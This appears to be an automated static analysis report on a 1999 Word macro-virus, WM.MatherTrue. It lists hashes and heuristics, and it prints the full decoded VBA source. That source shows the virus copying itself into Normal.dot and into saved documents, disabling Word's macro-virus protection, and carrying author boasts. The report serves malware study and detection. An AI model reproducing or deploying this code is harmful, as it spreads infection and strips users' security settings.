Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 990b94bb0b01b507…

MALICIOUS

Office (OLE)

Size: 35.5 KB | Created: 1997-07-07 09:37:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-10-03
MD5: e80226b7de9c32c543b2f8616357916c
SHA-1: e77577c19c801a51509c100fc0cad0a4a7599d37
SHA-256: 990b94bb0b01b50718c74c4e3a2216f729f4c6a32b5c34b89e8d8580bbae2663
Risk Score: 228

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic)

The sample exhibits characteristics of a legacy WordBasic macro-virus, specifically triggering on 'ToolsMacro' and 'AutoOpen'. While the VBA code is truncated, the presence of these markers and the ClamAV detection of 'Win.Trojan.C-286' strongly indicate malicious intent, likely to execute further payloads.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
      .VirusProtection = False
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
      Public Sub AutoOpen()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 36,352 bytes but its declared streams total only 16,490 bytes — 19,862 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7029 bytes
SHA-256: 4f2365f211bff973e9feec6a07e21d83c72b1abff9aa65ef666f1b7378ebaa9e
Detection: ClamAV Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script; comments originally in CP1251-encoded Russian are translated below):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MatherTrue"
Option Explicit

  Dim ResultFDoc As Boolean 'True if the active document contains a module named Mname
  Dim ResultFTemplite As Boolean 'True if Normal.Dot contains a module named Mname
  Dim Path_Normal As String 'path to Normal.Dot
  Dim Path_Doc As String 'path to the active document
  Dim I As Integer 'loop variable
  Dim HowMach As Integer 'number of modules in the project
  Dim Doc As Boolean
  Dim N As Integer

  Public Const Mname As String = "MatherTrue" 'name of the module to take the code from
  
'Called when the Organizer button is pressed
Public Sub Organizer()
Attribute Organizer.VB_Description = "Макрос записан 31.03.99 33715351"
Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.DS"
           CommandBars("Visual Basic").Enabled = True
           With CommandBars("Macro")
             For I = 1 To .Controls.Count
                 .Controls(I).Enabled = False
             Next I
           End With
           ShowVisualBasicEditor = False
           Application.DisplayStatusBar = True
           With Options
                .VirusProtection = False
                .AllowFastSave = True
                .SaveInterval = 3
           End With
End Sub

'Called when the Macro button is pressed
Public Sub ToolsMacro()
End Sub

'Called when a new document is created (when Word starts, a new document is created automatically)
Public Sub AutoNew()
           Call Organizer
End Sub

'Called when saving the active document or template (pressing the "Save" button)
Public Sub FileSave()
              Doc = False
              N = Len(ActiveDocument.Name)
           If N < 10 Then N = 1
           If N >= 10 And N <= 99 Then N = 2
           If N >= 99 And N <= 1000 Then N = 3
           If Mid(ActiveDocument.Name, 1, Len(ActiveDocument.Name) - N) = "Документ" Then Doc = True
           ShowVisualBasicEditor = True
           ResultFDoc = False
           If PrintPreview = False Then
              HowMach = Application.ActiveDocument.VBProject.VBComponents.Count
              For I = 1 To HowMach
                If Mname = Application.ActiveDocument.VBProject.VBComponents(I).Name Then ResultFDoc = True
              Next I
              If ResultFDoc <> True Then
                 Path_Normal = Application.NormalTemplate.FullName
                 Path_Doc = Application.ActiveDocument.FullName
                 Application.OrganizerCopy Source:=Path_Normal, Destination:=Path_Doc, Name:=Mname, Object:=wdOrganizerObjectProjectItems
                 Call Organizer
              End If
            If Doc = True Then Dialogs(wdDialogFileSaveAs).Show: Exit Sub
            ActiveDocument.Save
            End If
End Sub

'Called when saving all active documents and/or templates (pressing the "Save All" button)
Public Sub FileSaveAll()
           ShowVisualBasicEditor = False
           Call FileSave
End Sub

'Called when printing with the current settings
Public Sub FilePrintDefault()
           ShowVisualBasicEditor = False
         '  ActiveDocument.Content.InsertAfter Text:="Вот такая она правда-мамка, а против правды не попрёшь...Привет  Михайловой Юльке. Coded by DI°            WM.MatherTrue -  I see, i'm here, i'm conqure ..."
           ActiveDocument.PrintOut
End Sub

'Called when the Print dialog is opened
Public Sub FilePrint()
           ShowVisualBasicEditor = False
        '   ActiveDocument.Content.InsertAfter Text:="Вот такая она правда-мамка, а против правды не попрёшь...Привет  Михайловой Юльке. Coded by DI°            WM.MatherTrue -  I see, i'm here, i'm conqure ... "
           Dialogs(wdDialogFilePrint).Show
End Sub

'Called when a document/template is opened
'installs the code into Normal.Dot
Public Sub AutoOpen()
           ResultFTemplite = False
           If PrintPreview = False Then
              HowMach = Application.NormalTemplate.VBProject.VBComponents.Count
              For I = 1 To HowMach
                If Mname = Application.NormalTemplate.VBProject.VBComponents(I).Name Then ResultFTemplite = True
              Next I
              If ResultFTemplite <> True Then
                 Path_Normal = Application.NormalTemplate.FullName
                 Path_Doc = Application.ActiveDocument.FullName
                 Application.OrganizerCopy Source:=Path_Doc, Destination:=Path_Normal, Name:=Mname, Object:=wdOrganizerObjectProjectItems
              End If
           End If
End Sub
' Destroyer Inc° Or PIPA's E&CS™ Company presented the
' MacroVirus WM.MatherTrue
' (C) CopyRight 16.04.1999 Ukrein Hmelnitsky
' WM.MatherTrue Was Make In Ms Offise (MS Word - 8.0)
' Hackers And VirusMakers All Country - UNITED !!!
' "Virus For PC, PC For Virus"
' Big Hy For VRV Virus Production™, Predator'S°,SNAKE,S@S,DM,AlexHelraiser  by Destroyer Inc °
' DEMOB is unavoidable !!!' ARIA is immortal !!! ARIA The Best !!!
'
' #####      ######    #####    #######   ######     ####    #     #   ######   ######
' #    ##    #    #   #     #      #      #     #   #    #   #     #   #    #   #     #
' #     ##   # #      #            #      #     #   #    #   #     #   # #      #     #
' #      #   ###       #####       #      ######    #    #    #### #   ###      ######
' #     ##   # #            #      #      #  #      #    #         #   # #      #  #
' #    ##    #    #   #     #      #      #   #     #    #         #   #    #   #   #
' #####      ######    #####       #      #    #     ####     ####     ######   #    #
'
'
'         #######   #     #   #######   ##
'            #      ##    #   #     #   ##
'            #      # #   #   #
'            #      #  #  #   #
'            #      #   # #   #
'            #      #    ##   #
'         #######   #     #   #######
'
'